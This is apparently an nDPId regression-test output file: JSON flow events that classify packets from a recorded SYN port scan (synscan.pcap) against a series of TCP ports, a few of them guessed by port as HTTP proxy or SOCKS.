+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":744,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059632,"flow_last_seen":1278275059632,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1072,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":744,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059632,"flow_last_seen":1278275059632,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1072,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":249,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058471,"flow_last_seen":1278275058471,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1071,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":249,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058471,"flow_last_seen":1278275058471,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1071,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":811,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059741,"flow_last_seen":1278275059741,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1072,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":811,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059741,"flow_last_seen":1278275059741,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1072,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":175,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058221,"flow_last_seen":1278275058221,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1073,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":175,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058221,"flow_last_seen":1278275058221,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1073,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1650,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060904,"flow_last_seen":1278275060904,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1074,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1650,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060904,"flow_last_seen":1278275060904,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1074,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":199,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058345,"flow_last_seen":1278275058345,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1073,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":199,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058345,"flow_last_seen":1278275058345,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1073,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1721,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061006,"flow_last_seen":1278275061006,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1074,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1721,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061006,"flow_last_seen":1278275061006,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1074,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":97,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058030,"flow_last_seen":1278275058030,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1075,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":97,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058030,"flow_last_seen":1278275058030,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1075,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1483,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060698,"flow_last_seen":1278275060698,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1076,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1483,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060698,"flow_last_seen":1278275060698,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1076,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":153,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058156,"flow_last_seen":1278275058156,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1075,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":153,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058156,"flow_last_seen":1278275058156,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1075,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1566,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060801,"flow_last_seen":1278275060801,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1076,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1566,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060801,"flow_last_seen":1278275060801,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1076,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1333,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060492,"flow_last_seen":1278275060492,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1077,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1333,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060492,"flow_last_seen":1278275060492,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1077,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1412,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060596,"flow_last_seen":1278275060596,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1077,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1412,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060596,"flow_last_seen":1278275060596,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1077,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":748,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059632,"flow_last_seen":1278275059632,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1078,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":748,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059632,"flow_last_seen":1278275059632,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1078,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":807,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059741,"flow_last_seen":1278275059741,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1078,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":807,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059741,"flow_last_seen":1278275059741,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1078,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":771,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059676,"flow_last_seen":1278275059676,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1079,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":771,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059676,"flow_last_seen":1278275059676,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1079,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00649{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1831,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061158,"flow_last_seen":1278275061158,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3128,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP_Proxy","breed":"Acceptable","category":"Web"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1831,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061158,"flow_last_seen":1278275061158,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3128,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00644{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1694,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061002,"flow_last_seen":1278275061002,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1080,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"SOCKS","breed":"Acceptable","category":"Web"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1694,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061002,"flow_last_seen":1278275061002,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":826,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059785,"flow_last_seen":1278275059785,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1079,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":826,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059785,"flow_last_seen":1278275059785,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1079,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":618,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059456,"flow_last_seen":1278275059456,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":54328,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":618,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059456,"flow_last_seen":1278275059456,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":54328,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00649{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1900,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061260,"flow_last_seen":1278275061260,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3128,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP_Proxy","breed":"Acceptable","category":"Web"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1900,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061260,"flow_last_seen":1278275061260,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3128,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00644{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1763,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061104,"flow_last_seen":1278275061104,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1080,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"SOCKS","breed":"Acceptable","category":"Web"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1763,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061104,"flow_last_seen":1278275061104,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1490,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060698,"flow_last_seen":1278275060698,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1081,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1490,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060698,"flow_last_seen":1278275060698,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1081,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 